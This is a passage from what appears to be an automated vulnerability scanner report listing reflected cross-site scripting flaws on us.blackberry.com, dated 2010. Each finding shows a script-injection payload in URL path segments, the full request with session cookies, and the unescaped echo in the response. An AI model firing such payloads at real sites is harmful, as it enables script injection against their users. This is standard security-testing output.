<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrybold299a7"><script>alert(1)</script>c0485080a3f/wheretoDetails.jsp" />
...[SNIP]...

1.28. http://us.blackberry.com/smartphones/blackberrybold/wheretoDetails.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrybold/wheretoDetails.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e91"><script>alert(1)</script>a1c6c100ec6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smartphones/blackberrybold/e8e91"><script>alert(1)</script>a1c6c100ec6?cache=false&ajax=true HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/blackberrybold/#!where-to-buy
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: pointOfPurchaseUniqueSet=true; favorableUniqueSet=true; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":4,"to":3,"c":"http://us.blackberry.com/where-to-buy/united-states/","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1290619580850,"l":"en-US","i":-1}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.r={"d":90,"i":"1290619537652_749032","e":1291224374976}; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:48 GMT
Date: Wed, 24 Nov 2010 22:54:48 GMT
Connection: close
Content-Length: 21933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrybold/e8e91"><script>alert(1)</script>a1c6c100ec6/" />
...[SNIP]...

1.29. http://us.blackberry.com/smartphones/blackberrybold/wheretoDetailsHero.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrybold/wheretoDetailsHero.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a360"><script>alert(1)</script>aba814ec120 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartphones/blackberrybold8a360"><script>alert(1)</script>aba814ec120/wheretoDetailsHero.jsp?cache=false HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/blackberrybold/#!where-to-buy
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: pointOfPurchaseUniqueSet=true; favorableUniqueSet=true; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":4,"to":3,"c":"http://us.blackberry.com/where-to-buy/united-states/","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1290619580850,"l":"en-US","i":-1}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.r={"d":90,"i":"1290619537652_749032","e":1291224374976}; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:46 GMT
Date: Wed, 24 Nov 2010 22:54:46 GMT
Connection: close
Content-Length: 21961


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrybold8a360"><script>alert(1)</script>aba814ec120/wheretoDetailsHero.jsp" />
...[SNIP]...

1.30. http://us.blackberry.com/smartphones/blackberrybold/wheretoDetailsHero.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrybold/wheretoDetailsHero.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42aaf"><script>alert(1)</script>a28f182402e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smartphones/blackberrybold/42aaf"><script>alert(1)</script>a28f182402e?cache=false HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/blackberrybold/#!where-to-buy
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: pointOfPurchaseUniqueSet=true; favorableUniqueSet=true; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":4,"to":3,"c":"http://us.blackberry.com/where-to-buy/united-states/","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1290619580850,"l":"en-US","i":-1}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.r={"d":90,"i":"1290619537652_749032","e":1291224374976}; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:47 GMT
Date: Wed, 24 Nov 2010 22:54:47 GMT
Connection: close
Content-Length: 21919


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrybold/42aaf"><script>alert(1)</script>a28f182402e/" />
...[SNIP]...

1.31. http://us.blackberry.com/smartphones/blackberrycurve3G/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrycurve3G/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5670"><script>alert(1)</script>6392a1e5aae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartphones/blackberrycurve3Ga5670"><script>alert(1)</script>6392a1e5aae/ HTTP/1.1
Host: us.blackberry.com
Proxy-Connection: keep-alive
Referer: http://www.blackberry.com/oops.shtml
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_sv_sid=1156311581177; s_vi=[CS]v1|2676A072051D2E5C-400001338043ADE5[CE]; s_nr=1290620281571; s_sv_s1=1@16@a//1290620222072; s_sv_p1=1@15@d/2210/2334&e/3; s_cc=true; dfa_cookie=rimglobal%2Crimbbus%2Crimbbww; s_sq=rimglobal%2Crimbbww%3D%2526pid%253Dhttp%25253A//www.blackberry.com/oops.shtml%2526oid%253Dhttp%25253A//us.blackberry.com/smartphones/blackberrycurve3G/%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:05 GMT
Date: Wed, 24 Nov 2010 22:55:05 GMT
Connection: close
Content-Length: 21912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrycurve3Ga5670"><script>alert(1)</script>6392a1e5aae/" />
...[SNIP]...

1.32. http://us.blackberry.com/smartphones/blackberrycurve3G/overviewDetails.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrycurve3G/overviewDetails.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41367"><script>alert(1)</script>9261d1ab8b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartphones/blackberrycurve3G41367"><script>alert(1)</script>9261d1ab8b2/overviewDetails.jsp?cache=false&ajax=true HTTP/1.1
Host: us.blackberry.com
Proxy-Connection: keep-alive
Referer: http://us.blackberry.com/smartphones/blackberrycurve3G/
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: favorableUniqueSet=true; s_sv_sid=1156311581177; s_vi=[CS]v1|2676A072051D2E5C-400001338043ADE5[CE]; s_nr=1290620281571; s_cc=true; dfa_cookie=rimglobal%2Crimbbus%2Crimbbww; BLLY=3V52KTzZgRwwiqS0ZkXafxn3jZ8pMmePRqPWT13w8znNReheU-SwWGA; s_sq=rimbbww%3D%2526pid%253Dhttp%25253A%252F%252Fwww.blackberry.com%252Foops.shtml%2526oid%253Dhttp%25253A%252F%252Fus.blackberry.com%252Fsmartphones%252Fblackberrycurve3G%252F%2526ot%253DA; s_sv_s1=1@16@a//1290620222072; s_sv_p1=1@15@d/2210/2334&e/4

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:45 GMT
Date: Wed, 24 Nov 2010 22:54:45 GMT
Connection: close
Content-Length: 21975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrycurve3G41367"><script>alert(1)</script>9261d1ab8b2/overviewDetails.jsp" />
...[SNIP]...

1.33. http://us.blackberry.com/smartphones/blackberrycurve3G/overviewDetails.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrycurve3G/overviewDetails.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c426"><script>alert(1)</script>bdb3a0a1777 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smartphones/blackberrycurve3G/4c426"><script>alert(1)</script>bdb3a0a1777?cache=false&ajax=true HTTP/1.1
Host: us.blackberry.com
Proxy-Connection: keep-alive
Referer: http://us.blackberry.com/smartphones/blackberrycurve3G/
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: favorableUniqueSet=true; s_sv_sid=1156311581177; s_vi=[CS]v1|2676A072051D2E5C-400001338043ADE5[CE]; s_nr=1290620281571; s_cc=true; dfa_cookie=rimglobal%2Crimbbus%2Crimbbww; BLLY=3V52KTzZgRwwiqS0ZkXafxn3jZ8pMmePRqPWT13w8znNReheU-SwWGA; s_sq=rimbbww%3D%2526pid%253Dhttp%25253A%252F%252Fwww.blackberry.com%252Foops.shtml%2526oid%253Dhttp%25253A%252F%252Fus.blackberry.com%252Fsmartphones%252Fblackberrycurve3G%252F%2526ot%253DA; s_sv_s1=1@16@a//1290620222072; s_sv_p1=1@15@d/2210/2334&e/4

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:46 GMT
Date: Wed, 24 Nov 2010 22:54:46 GMT
Connection: close
Content-Length: 21939


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrycurve3G/4c426"><script>alert(1)</script>bdb3a0a1777/" />
...[SNIP]...

1.34. http://us.blackberry.com/smartphones/blackberrycurve3G/overviewDetailsHero.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrycurve3G/overviewDetailsHero.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 522cc"><script>alert(1)</script>4ceebd02692 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartphones/blackberrycurve3G522cc"><script>alert(1)</script>4ceebd02692/overviewDetailsHero.jsp?cache=false HTTP/1.1
Host: us.blackberry.com
Proxy-Connection: keep-alive
Referer: http://us.blackberry.com/smartphones/blackberrycurve3G/
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: favorableUniqueSet=true; s_sv_sid=1156311581177; s_vi=[CS]v1|2676A072051D2E5C-400001338043ADE5[CE]; s_nr=1290620281571; s_cc=true; dfa_cookie=rimglobal%2Crimbbus%2Crimbbww; BLLY=3V52KTzZgRwwiqS0ZkXafxn3jZ8pMmePRqPWT13w8znNReheU-SwWGA; s_sq=rimbbww%3D%2526pid%253Dhttp%25253A%252F%252Fwww.blackberry.com%252Foops.shtml%2526oid%253Dhttp%25253A%252F%252Fus.blackberry.com%252Fsmartphones%252Fblackberrycurve3G%252F%2526ot%253DA; s_sv_s1=1@16@a//1290620222072; s_sv_p1=1@15@d/2210/2334&e/4

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:48 GMT
Date: Wed, 24 Nov 2010 22:54:48 GMT
Connection: close
Content-Length: 21969


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrycurve3G522cc"><script>alert(1)</script>4ceebd02692/overviewDetailsHero.jsp" />
...[SNIP]...

1.35. http://us.blackberry.com/smartphones/blackberrycurve3G/overviewDetailsHero.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrycurve3G/overviewDetailsHero.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 118e4"><script>alert(1)</script>7d17adf35f4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smartphones/blackberrycurve3G/118e4"><script>alert(1)</script>7d17adf35f4?cache=false HTTP/1.1
Host: us.blackberry.com
Proxy-Connection: keep-alive
Referer: http://us.blackberry.com/smartphones/blackberrycurve3G/
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: favorableUniqueSet=true; s_sv_sid=1156311581177; s_vi=[CS]v1|2676A072051D2E5C-400001338043ADE5[CE]; s_nr=1290620281571; s_cc=true; dfa_cookie=rimglobal%2Crimbbus%2Crimbbww; BLLY=3V52KTzZgRwwiqS0ZkXafxn3jZ8pMmePRqPWT13w8znNReheU-SwWGA; s_sq=rimbbww%3D%2526pid%253Dhttp%25253A%252F%252Fwww.blackberry.com%252Foops.shtml%2526oid%253Dhttp%25253A%252F%252Fus.blackberry.com%252Fsmartphones%252Fblackberrycurve3G%252F%2526ot%253DA; s_sv_s1=1@16@a//1290620222072; s_sv_p1=1@15@d/2210/2334&e/4

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:50 GMT
Date: Wed, 24 Nov 2010 22:54:50 GMT
Connection: close
Content-Length: 21925


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrycurve3G/118e4"><script>alert(1)</script>7d17adf35f4/" />
...[SNIP]...

1.36. http://us.blackberry.com/smartphones/blackberrytorch/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrytorch/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdfea"><script>alert(1)</script>b783b25eebd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartphones/blackberrytorchfdfea"><script>alert(1)</script>b783b25eebd/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://us.blackberry.com/smartphones/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: favorableUniqueSet=true; s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Adevices%25253ADevices%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fus.blackberry.com%25252Fsmartphones%25252Fblackberrytorch%25252F%252523!where-to-buy%2526ot%253DA%2526oi%253D590; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/8; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=fortnelson; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:02 GMT
Date: Wed, 24 Nov 2010 22:55:02 GMT
Connection: close
Content-Length: 21908


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrytorchfdfea"><script>alert(1)</script>b783b25eebd/" />
...[SNIP]...

1.37. http://us.blackberry.com/smartphones/blackberrytorch/wheretoDetails.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrytorch/wheretoDetails.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f47e"><script>alert(1)</script>cee2330fe3e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartphones/blackberrytorch3f47e"><script>alert(1)</script>cee2330fe3e/wheretoDetails.jsp?cache=false&ajax=true HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/blackberrytorch/#!where-to-buy
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: pointOfPurchaseUniqueSet=true; favorableUniqueSet=true; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/9; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=fortnelson; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:50 GMT
Date: Wed, 24 Nov 2010 22:54:50 GMT
Connection: close
Content-Length: 21969


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrytorch3f47e"><script>alert(1)</script>cee2330fe3e/wheretoDetails.jsp" />
...[SNIP]...

1.38. http://us.blackberry.com/smartphones/blackberrytorch/wheretoDetails.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
